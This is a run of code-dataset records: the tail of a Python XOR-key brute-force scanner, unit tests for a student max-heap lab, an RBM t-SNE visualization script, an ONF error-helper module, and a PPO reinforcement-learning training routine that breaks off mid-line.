print(\"--------------------------------------------------------------------\")\n for h in hexrange :\n tmpCnt = 0\n longest = 0\n over4 = 0\n if xorlen == 1: \n hexStr = \"%#0.2x\"%((h))\n h1 = int(hexStr[2:4],16)\n key = bytearray([h1])\n xorData = xor(b, key)\n asciiCount = 0\n dataLen = len(xorData)\n for x in xorData:\n if x in asciiChrs:\n asciiCount += 1\n tmpCnt += 1\n else:\n if tmpCnt > longest: longest = tmpCnt\n if tmpCnt > 4: over4 += 1\n tmpCnt = 0\n perAscii = (asciiCount/dataLen) * 100\n if perAscii >= threshold :\n print(\"|{0:^15}|{1:^15.0f}|{2:^15}|{3:^18}|\".format(hexStr, perAscii, longest, over4)) \n if printData: printXORData(xorData)\n else:\n hexStr = \"%#0.4x\"%((h))\n h1 = int(hexStr[2:4],16)\n h2 = int(hexStr[4:6],16)\n key = bytearray([h1, h2])\n xorData = xor(b, key)\n asciiCount = 0\n dataLen = len(xorData)\n for x in xorData:\n if x in asciiChrs:\n asciiCount += 1\n tmpCnt += 1\n else:\n if tmpCnt > longest: longest = tmpCnt\n if tmpCnt > 4: over4 += 1\n tmpCnt = 0\n perAscii = (asciiCount/dataLen) * 100\n if perAscii >= threshold :\n print(\"|{0:^15}|{1:^15.0f}|{2:^15}|{3:^18}|\".format(hexStr, perAscii, longest, over4)) \n if printData: printXORData(xorData)\n print(\"--------------------------------------------------------------------\")\nif __name__ == \"__main__\":\n main(sys.argv[1:]) \n \n\n","sub_path":"xorAscii.py","file_name":"xorAscii.py","file_ext":"py","file_size_in_byte":7100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"68004256","text":"# Name: Jeffery Ho\r\n# Section: 202 - 11\r\n\r\nimport unittest\r\nfrom heap_lab import *\r\n\r\nclass TestList(unittest.TestCase):\r\n def test_insert(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,4,3,2]\r\n heap1.size = 4\r\n heap1.insert(1)\r\n result1 = MaxHeap(6)\r\n result1.size = 5\r\n result1.heap =[0,5,4,3,2,1]\r\n self.assertEqual(heap1, result1)\r\n self.assertTrue(heap1.insert(0))\r\n self.assertFalse(heap1.insert(10))\r\n\r\n\r\n def test_find_max(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,4,3,2]\r\n heap1.size = 4\r\n heap2 = MaxHeap(6)\r\n self.assertEqual(heap1.find_max(), 5)\r\n self.assertFalse(heap2.find_max())\r\n\r\n def test_del_max(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,4,3,2]\r\n heap1.size = 4\r\n heap2 = MaxHeap(6)\r\n heap2.size = 3\r\n heap2.heap = [0,4,2,3]\r\n heap3 = MaxHeap(6)\r\n self.assertEqual(heap1.del_max(), 5)\r\n self.assertEqual(heap3.del_max(), None)\r\n\r\n def test_heap_contents(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,4,3,2]\r\n heap1.size = 4\r\n self.assertEqual(heap1.heap_contents(), [0,5,4,3,2])\r\n\r\n def test_build_heap(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,3,4,2]\r\n heap1.size = 4\r\n alist = [2,3,4,5]\r\n heap2 = MaxHeap(6)\r\n heap3 = MaxHeap(3)\r\n self.assertTrue(heap2.build_heap(alist))\r\n self.assertTrue(heap2 == heap1)\r\n self.assertFalse(heap3.build_heap(alist))\r\n\r\n def test_is_empty(self):\r\n heap1 = MaxHeap(6)\r\n self.assertTrue(heap1.is_empty())\r\n heap1.insert(1)\r\n self.assertFalse(heap1.is_empty())\r\n\r\n def test_is_full(self):\r\n heap1 = MaxHeap(1)\r\n self.assertFalse(heap1.is_full())\r\n heap1.insert(1)\r\n self.assertTrue(heap1.is_full())\r\n\r\n def test_get_heap_cap(self):\r\n heap1 = MaxHeap(1)\r\n self.assertEqual(heap1.get_heap_cap(), 1)\r\n\r\n def test_get_heap_size(self):\r\n heap1 = MaxHeap(1)\r\n self.assertEqual(heap1.get_heap_size(), 0)\r\n\r\n def test_perc_down(self):\r\n alist = [2,3,4,5]\r\n heap1 = MaxHeap(6)\r\n heap1.build_heap(alist)\r\n self.assertEqual(heap1.heap, [0,5,3,4,2])\r\n\r\n def test_perc_up(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,2,4,1]\r\n heap1.size = 4\r\n heap1.insert(3)\r\n self.assertEqual(heap1.heap, [0,5,3,4,1,2])\r\n\r\n def test_heap_sort_increase(self):\r\n heap1 = MaxHeap()\r\n alist = [1,2,3,4,5,6]\r\n self.assertEqual(heap1.heap_sort_increase(alist), [0,1,2,3,4,5,6])\r\n\r\nif __name__ == '__main__': \r\n unittest.main()\r\n","sub_path":"Lab 7/heap_lab_tests.py","file_name":"heap_lab_tests.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"157383987","text":"\n# coding: utf-8\n\n# In[120]:\n\n\nimport numpy as np \nimport pandas as pd \nimport sys \nimport os \nimport pickle \nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\n\n\n# In[121]:\n\n\ndef saveObject(obj,name): \n pickle.dump(obj,open( \"tsne/\"+name+\".pkl\", \"wb\" ))\n\ndef loadObject(name):\n obj = pickle.load( open( \"tsne/\"+name+\".pkl\", \"rb\" ) )\n return obj\n\n\n# In[122]:\n\n\nBintestFeatures = loadObject(\"BintestFeatures\")\nBintestLabels = loadObject(\"BintestLabels\")\n\n\n# In[123]:\n\n\n\n\n(test_row,test_col) = (np.shape(BintestFeatures)) #Validation Operation\n(t_row) = (np.shape(BintestLabels)) #Validation Operation\n\n\n# In[124]:\n\n\n#BintestFeatures[0]\n\n\n# In[125]:\n\n\nnp.random.seed(1234)\nk = 1\nnum_hidden = 3\nnum_visible = 784\nlr = 0.001\nepoch = 0\n\n\n# In[126]:\n\n\nnp_rng = np.random.RandomState(1234)\n\n\n# In[127]:\n\n\ndef sigmoid(x):\n return 1. / (1 + np.exp(-x))\n\n\ndef test(point,W,b,c):\n hid = sigmoid(np.dot(point,W) + b)\n re = sigmoid(np.dot(hid,W.T) + c)\n return re\n\n\n# # MAiN CODE\n\n# In[128]:\n\n\nprint(\"Here the testing starts, please check k and epoch \")\n\n[W,b,c] = loadObject(str(num_hidden))\nabstract = test(BintestFeatures,W,b,c)\nsaveObject(abstract,'abstract_hid_'+str(num_hidden))\n\n\n# In[129]:\n\n\n#Extract data\n\n# abstract = np.zeros([points,dim])\n# abstract = loadObject('abstract_hid_'+str(num_hidden)+'_itr_'+str(epoch)+'_k_'+str(k)+'_lr_'+str(lr))\n\n\n# In[130]:\n\n\n#Extract label\n# BintestLabels = np.zeros([points,1])\n# BintestLabels = loadObject('BintrainLabels')\n\n\n# In[131]:\n\n\nfeat_cols = [ 'pixel'+str(i) for i in range(784) ]\n\ndf = pd.DataFrame(abstract,columns=feat_cols)\ndf['label'] = BintestLabels\ndf['label'] = df['label'].apply(lambda i: str(i))\n\n\n# In[144]:\n\n\nrndperm = np.random.permutation(df.shape[0])\n\nn_sne = 10000 # since we have 10000 test images \n\ntsne = TSNE(n_components=2, verbose=0, perplexity=40, n_iter=250,learning_rate=100.0)\ntsne_results = tsne.fit_transform(df.loc[rndperm[:n_sne],feat_cols].values)\n\ndf_tsne = df.loc[rndperm[:n_sne],:].copy()\ndf_tsne['x-tsne'] = tsne_results[:,0]\ndf_tsne['y-tsne'] = tsne_results[:,1]\n\n\nsaveObject(df_tsne,'tsnehid_'+str(num_hidden))\n\n\n# In[145]:\n\n\nfrom ggplot import *\n\n\n# In[147]:\n\n\nchart = ggplot( df_tsne, aes(x='x-tsne', y='y-tsne', color='label') ) + geom_point(size=70,alpha=0.1) + ggtitle(\"k = \"+str(num_hidden)+\" tsne\")\nchart\n\nchart.save(str(num_hidden)+\"32\"+\".pdf\")\n\n\n# In[38]:\n\n\n\n\n","sub_path":"testingRBM.py","file_name":"testingRBM.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"558297472","text":"# -*- python -*-\n## -----------------------------------------------------------------------\n## Intent: This module contains general helper methods\n## -----------------------------------------------------------------------\n\n# -----------------------------------------------------------------------\n# Copyright 2022 Open Networking Foundation (ONF) and the ONF Contributors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -----------------------------------------------------------------------\n\n##-------------------##\n##---] IMPORTS [---##\n##-------------------##\nimport sys\nimport pprint\n\n## ---------------------------------------------------------------------------\n## ---------------------------------------------------------------------------\ndef iam():\n \"\"\"Return name of a called method.\"\"\"\n\n func_name = sys._getframe(1).f_code.co_name # pylint: disable=protected-access\n iam = \"%s::%s\" % (__name__, func_name)\n return iam\n\n## -----------------------------------------------------------------------\n## Intent: Display a message then exit with non-zero status.\n## This method cannot be intercepted by try/except\n## -----------------------------------------------------------------------\ndef error(msg, exit_with=None, fatal=None):\n \"\"\"Display a message then exit with non-zero status.\n\n :param msg: Error mesage to display.\n :type msg: string\n\n :param exit_with: Shell exit status.\n :type exit_with: int, optional (default=2)\n\n :param fatal: When true raise an exception.\n :type fatal: bool (default=False)\n\n \"\"\"\n\n if exit_with is None:\n exit_with = 2\n\n if fatal is None:\n fatal = false\n\n if msg:\n if fatal:\n raise Exception(\"ERROR: %s\" % msg)\n else:\n print(\"\")\n print(\"ERROR: %s\" % msg)\n\n sys.exit(exit_with)\n\n# EOF\n","sub_path":"scripts/flog/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"309627771","text":"from baselines.common import Dataset, explained_variance, fmt_row, zipsame\nfrom baselines import logger\nimport baselines.common.tf_util as U\nimport tensorflow as tf, numpy as np\nimport time\nfrom baselines.common.mpi_adam import MpiAdam\nfrom baselines.common.mpi_moments import mpi_moments\nfrom mpi4py import MPI\nfrom collections import deque\nimport os\nimport json\nimport pickle\n\ndef traj_segment_generator(pi, env, horizon, stochastic, num_parallel, num_cpu, rank, ob_size, ac_size, com):\n t = 0\n ac = env.action_space.sample() # not used, just so we have the datatype\n if num_parallel == 0:\n new = True # marks if we're on first timestep of an episode\n ob = env.reset()\n\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n ep_rets = [] # returns of completed episodes in this segment\n ep_lens = [] # lengths of ...\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n acs = np.array([ac for _ in range(horizon)])\n prevacs = acs.copy()\n\n while True:\n prevac = ac\n ac, vpred = pi.act(stochastic, ob)\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\" : obs, \"rew\" : rews, \"vpred\" : vpreds, \"new\" : news,\n \"ac\" : acs, \"prevac\" : prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\" : ep_rets, \"ep_lens\" : ep_lens}\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_lens = []\n i = t % horizon\n obs[i] = ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n\n ob, rew, new, _ = env.step(ac)\n rews[i] = rew\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_len = 0\n ob = env.reset()\n t += 1\n elif num_cpu == num_parallel:\n new = True # marks if we're on first timestep of an episode\n\n if rank == 0:\n ob_whole = env.reset()\n #print(\"t = \" + str(t) + \" ob_whole = \" + str(ob_whole))\n ob_flat = np.reshape(ob_whole, num_parallel * ob_size)\n #print(\"Rank = 0 obs_whole = \" + str(ob_whole))\n else:\n ob_flat = None\n ob = np.zeros(ob_size, 'float32')\n com.Scatter(ob_flat, ob, root=0)\n\n #print(\"Rank = \" + str(rank) + \" ob = \" + str(ob))\n #exit(0)\n\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n ep_rets = [] # returns of completed episodes in this segment\n ep_lens = [] # lengths of ...\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n\n acs = np.zeros((horizon, ac.shape[0]), 'float32')\n prevacs = acs.copy()\n ac = np.zeros(ac.shape[0], 'float32')\n\n vpred_a = np.zeros(1,'float32')\n rew_a = np.zeros(1,'float32')\n new_a = np.zeros(1,'uint8')\n while True:\n prevac = ac\n #ac, vpred = pi.act(stochastic, ob)\n\n if rank == 0:\n ac_whole, vpred_whole = pi.act_parallel(stochastic, ob_whole)\n #print(\"t = \" + str(t) + \" ac_whole = \" + str(ac_whole) + \" vpred_whole = \" + str(vpred_whole))\n ac_flat = np.reshape(ac_whole, num_parallel * ac_size)\n vpred_flat = np.reshape(vpred_whole, num_parallel)\n else:\n ac_flat = None\n vpred_flat = None\n\n com.Scatter(ac_flat, ac, root=0)\n com.Scatter(vpred_flat, vpred_a, root=0)\n vpred = vpred_a[0]\n #print(\"t = \" + str(t) + \" rank = \" + str(rank) + \" ac = \" + str(ac) + \"vpred = \" + str(vpred))\n\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\": obs, \"rew\": rews, \"vpred\": vpreds, \"new\": news,\n \"ac\": acs, \"prevac\": prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\": ep_rets, \"ep_lens\": ep_lens}\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_lens = []\n i = t % horizon\n obs[i] = ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n #print(\"rank = \" + str(rank)+ \" i = \" + str(i) + \" ob = \" + str(ob))\n if rank == 0:\n ob_whole, rew_whole, new_whole, _ = env.step_parallel(ac_whole)\n #print(\"t = \" + str(t) + \" ob_whole = \" + str(ob_whole) + \" rew_whole = \" + str(rew_whole) + \" new_whole = \" + str(new_whole))\n\n ob_flat = np.reshape(ob_whole, num_parallel * ob_size)\n rew_flat = np.reshape(rew_whole, num_parallel)\n new_flat = np.reshape(new_whole, num_parallel)\n #print(\"t = \" + str(t) + \" ob_flat= \" + str(ob_flat) + \" rew_flat = \" + str(rew_flat) + \" new_flat = \" + str(new_flat))\n else:\n ob_flat = None\n rew_flat = None\n new_flat = None\n\n com.Scatter(ob_flat, ob, root=0)\n com.Scatter(rew_flat, rew_a, root=0)\n rew = rew_a[0]\n com.Scatter(new_flat, new_a, root=0)\n new = new_a[0]\n #print(\"t = \" + str(t) + \" rank = \" + str(rank) + \" ob = \" + str(ob) + \" rew = \" + str(rew)+ \" new = \" + str(new))\n\n rews[i] = rew\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_len = 0\n #ob = env.reset()\n t += 1\n else:\n new = np.ones(num_parallel, 'int32') # marks if we're on first timestep of an episode\n\n ob = env.reset_parallel()\n cur_ep_ret = [0 for _ in range(num_parallel)]\n cur_ep_len = [0 for _ in range(num_parallel)]\n ep_rets = [[] for _ in range(num_parallel)] # returns of completed episodes in this segment\n ep_lens = [[] for _ in range(num_parallel)] # lengths of ...\n\n # Initialize history arrays\n #obs = np.array([[ob for _ in range(horizon)] for __ in range(num_parallel)])\n obs = np.zeros((num_parallel, horizon, ob.shape[1]),'float32')\n rews = np.zeros((num_parallel, horizon), 'float32')\n vpreds = np.zeros((num_parallel, horizon), 'float32')\n news = np.zeros((num_parallel, horizon), 'int32')\n #acs = np.array([[ac for _ in range(horizon)] for __ in range(num_parallel)])\n acs = np.zeros((num_parallel, horizon, ac.shape[0]),'float32')\n prevacs = acs.copy()\n ac = np.zeros((num_parallel, ac.shape[0]),'float32')\n\n while True:\n prevac = ac\n ac, vpred = pi.act_parallel(stochastic, ob)\n #print(\"t = \" + str(t) + \" ac = \" + str(ac) + \" vpred = \" + str(vpred))\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n obs_all = np.reshape(obs, (horizon * num_parallel,-1))\n rews_all = np.reshape(rews, horizon * num_parallel)\n #for j in range(num_parallel):\n # vpreds[j][horizon] = vpred[j] * (1 - new[j])\n #vpreds_all = np.reshape(vpreds, horizon * num_parallel)\n vpreds_all = vpreds\n news_all = np.reshape(news, horizon * num_parallel)\n acs_all = np.reshape(acs, (horizon * num_parallel, -1))\n prevacs_all = np.reshape(prevacs, (horizon * num_parallel,-1))\n ep_rets_all = [item for sublist in ep_rets for item in sublist]\n ep_lens_all = [item for sublist in ep_lens for item in sublist]\n yield {\"ob\" : obs_all, \"rew\" : rews_all, \"vpred\" : vpreds_all, \"new\" : news_all,\n \"ac\" : acs_all, \"prevac\" : prevacs_all, \"nextvpred\": vpred * (1.0 - new),\n \"ep_rets\" : ep_rets_all, \"ep_lens\" : ep_lens_all}\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n for j in range(num_parallel):\n ep_rets[j] = []\n ep_lens[j] = []\n i = t % horizon\n for j in range(num_parallel):\n obs[j][i] = ob[j]\n vpreds[j][i] = vpred[j]\n news[j][i] = new[j]\n acs[j][i] = ac[j]\n prevacs[j][i] = prevac[j]\n ob, rew, new, _ = env.step_parallel(ac)\n #print(\"t = \" + str(t) + \" ob = \" + str(ob) + \" rew = \" + str(rew) + \" new = \" + str(new))\n for j in range(num_parallel):\n rews[j][i] = rew[j]\n cur_ep_ret[j] += rew[j]\n cur_ep_len[j] += 1\n if new[j]:\n ep_rets[j].append(cur_ep_ret[j])\n ep_lens[j].append(cur_ep_len[j])\n cur_ep_ret[j] = 0\n cur_ep_len[j] = 0\n #ob = env.reset()\n t += 1\n\ndef add_vtarg_and_adv(seg, gamma, lam, horizon, num_parallel, num_cpu):\n \"\"\"\n Compute target value using TD(lambda) estimator, and advantage with GAE(lambda)\n \"\"\"\n if (num_parallel <= 1) or (num_cpu == num_parallel):\n new = np.append(seg[\"new\"], 0) # last element is only used for last vtarg, but we already zeroed it if last new = 1\n vpred = np.append(seg[\"vpred\"], seg[\"nextvpred\"])\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n nonterminal = 1 - new[t+1]\n delta = rew[t] + gamma * vpred[t+1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n\n else:\n #vpred = np.reshape(np.concatenate((seg[\"vpred\"], np.reshape(seg[\"nextvpred\"], (num_parallel,1)) ), axis=1), (horizon + 1) * num_parallel)\n new = seg[\"new\"]\n vpred = seg[\"vpred\"] = np.reshape(seg[\"vpred\"], horizon * num_parallel)\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n if t % horizon == horizon-1: # last time step of an agent\n nonterminal = 1\n e = t // horizon\n delta = rew[t] + gamma * seg[\"nextvpred\"][e] * nonterminal - vpred[t]\n else:\n nonterminal = 1 - new[t + 1]\n delta = rew[t] + gamma * vpred[t + 1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n #print(\"convpred = \" + str(vpred))\n seg[\"tdlamret\"] = seg[\"adv\"] + seg[\"vpred\"]\n\ndef learn(env, policy_func, *,\n timesteps_per_batch, # timesteps per actor per update\n clip_param, entcoeff, # clipping parameter epsilon, entropy coeff\n optim_epochs, optim_stepsize, optim_batchsize, # optimization hypers\n gamma, lam, # advantage estimation\n max_timesteps=0, max_episodes=0, max_iters=0, max_seconds=0, # time constraint\n noisy_nets=False,\n callback=None, # you can do anything in the callback, since it takes locals(), globals()\n adam_epsilon=1e-5,\n schedule='constant', # annealing for stepsize parameters (epsilon and adam)\n desired_kl=0.02,\n logdir=\".\",\n agentName=\"PPO-Agent\",\n resume = 0,\n num_parallel=1,\n num_cpu=1\n ):\n # Setup losses and stuff\n # ----------------------------------------\n rank = MPI.COMM_WORLD.Get_rank()\n ob_space = env.observation_space\n ac_space = env.action_space\n\n ob_size = ob_space.shape[0]\n ac_size = ac_space.shape[0]\n\n #print(\"rank = \" + str(rank) + \" ob_space = \"+str(ob_space.shape) + \" ac_space = \"+str(ac_space.shape))\n #exit(0)\n pi = policy_func(\"pi\", ob_space, ac_space, noisy_nets) # Construct network for new policy\n oldpi = policy_func(\"oldpi\", ob_space, ac_space, noisy_nets) # Network for old policy\n atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n pol_entpen = (-entcoeff) * meanent\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold\n surr1 = ratio * atarg # surrogate from conservative policy iteration\n surr2 = U.clip(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg #\n pol_surr = - U.mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP)\n vfloss1 = tf.square(pi.vpred - ret)\n vpredclipped = oldpi.vpred + tf.clip_by_value(pi.vpred - oldpi.vpred, -clip_param, clip_param)\n vfloss2 = tf.square(vpredclipped - ret)\n vf_loss = .5 * U.mean(tf.maximum(vfloss1, vfloss2)) # we do the same clipping-based trust region for the value function\n #vf_loss = U.mean(tf.square(pi.vpred - ret))\n total_loss = pol_surr + pol_entpen + vf_loss\n losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n\n var_list = pi.get_trainable_variables()\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult], losses + [U.flatgrad(total_loss, var_list)])\n adam = MpiAdam(var_list, epsilon=adam_epsilon)\n\n assign_old_eq_new = U.function([],[], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses)\n\n U.initialize()\n adam.sync()\n\n # Prepare for rollouts\n # ----------------------------------------\n if noisy_nets:\n stochastic = False\n else:\n stochastic = True\n seg_gen = traj_segment_generator(pi, env, timesteps_per_batch, stochastic=stochastic, num_parallel=num_parallel, num_cpu=num_cpu, rank=rank, ob_size=ob_size, ac_size=ac_size,com=MPI.COMM_WORLD)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards\n\n saver = tf.train.Saver()\n if resume > 0:\n saver.restore(tf.get_default_session(), os.path.join(os.path.abspath(logdir), \"{}-{}\".format(agentName, resume)))\n iters_so_far = resume\n assert sum([max_iters>0, max_timesteps>0, max_episodes>0, max_seconds>0])==1, \"Only one time constraint permitted\"\n\n logF = open(os.path.join(logdir, 'log.txt'), 'a')\n logStats = open(os.path.join(logdir, 'log_stats.txt'), 'a')\n\n dump_training = 0\n learn_from_training = 0\n if dump_training:\n if os.path.exists(logdir + \"\\\\\" + 'ob_list_' + str(rank) + '.pkl'):\n with open(logdir + \"\\\\\" +'ob_list_' + str(rank) + '.pkl', 'rb') as f:\n ob_list = pickle.load(f)\n else:\n ob_list = []\n\n # , \"mean\": pi.ob_rms.mean, \"std\": pi.ob_rms.std\n saverRMS = tf.train.Saver({\"_sum\": pi.ob_rms._sum, \"_sumsq\": pi.ob_rms._sumsq, \"_count\": pi.ob_rms._count})\n saverRMS.save(tf.get_default_session(), os.path.join(os.path.abspath(logdir), \"rms.tf\"))\n\n ob_np_a = np.asarray(ob_list)\n ob_np = np.reshape(ob_np_a, (-1,ob_size))\n [vpred, pdparam] = pi._vpred_pdparam(ob_np)\n\n print(\"vpred = \" + str(vpred))\n print(\"pd_param = \" + str(pdparam))\n with open('training.pkl', 'wb') as f:\n pickle.dump(ob_np, f)\n pickle.dump(vpred, f)\n pickle.dump(pdparam, f)\n exit(0)\n\n if learn_from_training:\n # , \"mean\": pi.ob_rms.mean, \"std\": pi.ob_rms.std\n with open('training.pkl', 'rb') as f:\n ob_np = pickle.load(f)\n vpred = pickle.load(f)\n pdparam = pickle.load(f)\n num = ob_np.shape[0]\n for i in range(num):\n xp = ob_np[i][1]\n ob_np[i][1] = 0.0\n ob_np[i][18] -= xp\n ob_np[i][22] -= xp\n ob_np[i][24] -= xp\n ob_np[i][26] -= xp\n ob_np[i][28] -= xp\n ob_np[i][30] -= xp\n ob_np[i][32] -= xp\n ob_np[i][34] -= xp\n print(\"ob_np = \" + str(ob_np))\n print(\"vpred = \" + str(vpred))\n print(\"pdparam = \" + str(pdparam))\n batch_size = 128\n\n y_vpred = tf.placeholder(tf.float32, [batch_size, ])\n y_pdparam = tf.placeholder(tf.float32, [batch_size, pdparam.shape[1]])\n\n vpred_loss = U.mean(tf.square(pi.vpred - y_vpred))\n vpdparam_loss = U.mean(tf.square(pi.pdparam - y_pdparam))\n\n total_train_loss = vpred_loss + vpdparam_loss\n #total_train_loss = vpdparam_loss\n #total_train_loss = vpred_loss\n #coef = 0.01\n #dense_all = U.dense_all\n #for a in dense_all:\n # total_train_loss += coef * tf.nn.l2_loss(a)\n #total_train_loss = vpdparam_loss\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(total_train_loss)\n d = Dataset(dict(ob=ob_np, vpred=vpred, pdparam=pdparam), shuffle=not pi.recurrent)\n sess = tf.get_default_session()\n sess.run(tf.global_variables_initializer())\n saverRMS = tf.train.Saver({\"_sum\": pi.ob_rms._sum, \"_sumsq\": pi.ob_rms._sumsq, \"_count\": pi.ob_rms._count})\n saverRMS.restore(tf.get_default_session(), os.path.join(os.path.abspath(logdir), \"rms.tf\"))\n if resume > 0:\n saver.restore(tf.get_default_session(),\n os.path.join(os.path.abspath(logdir), \"{}-{}\".format(agentName, resume)))\n for q in range(100):\n sumLoss = 0\n for batch in d.iterate_once(batch_size):\n tl, _ = sess.run([total_train_loss, optimizer], feed_dict={pi.ob: batch[\"ob\"], y_vpred: batch[\"vpred\"], y_pdparam:batch[\"pdparam\"]})\n sumLoss += tl\n print(\"Iteration \" + str(q)+ \" Loss = \" + str(sumLoss))\n assign_old_eq_new() # set old parameter values to new parameter values\n\n # Save as frame 1\n try:\n saver.save(tf.get_default_session(), os.path.join(logdir, agentName), global_step=1)\n except:\n pass\n #exit(0)\n\n while True:\n if callback: callback(locals(), globals())\n if max_timesteps and timesteps_so_far >= max_timesteps:\n break\n elif max_episodes and episodes_so_far >= max_episodes:\n break\n elif max_iters and iters_so_far >= max_iters:\n break\n elif max_seconds and time.time() - tstart >= max_seconds:\n break\n\n if schedule == 'adaptive' or 'constant':\n cur_lrmult = 1.0\n elif schedule == 'linear':\n cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0.0)\n elif schedule == 'linear_clipped':\n cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0.2)\n elif schedule == 'cyclic':\n # cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n logger.log(\"********** Iteration %i ************\"%iters_so_far)\n\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam, timesteps_per_batch, num_parallel, num_cpu)\n #print(\" ob= \" + str(seg[\"ob\"])+ \" rew= \" + str(seg[\"rew\"])+ \" vpred= \" + str(seg[\"vpred\"])+ \" new= \" + str(seg[\"new\"])+ \" ac= \" + str(seg[\"ac\"])+ \" prevac= \" + str(seg[\"prevac\"])+ \" nextvpred= \" + str(seg[\"nextvpred\"])+ \" ep_rets= \" + str(seg[\"ep_rets\"])+ \" ep_lens= \" + str(seg[\"ep_lens\"]))\n\n #exit(0)\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n\n if dump_training:\n ob_list.append(ob.tolist())\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), 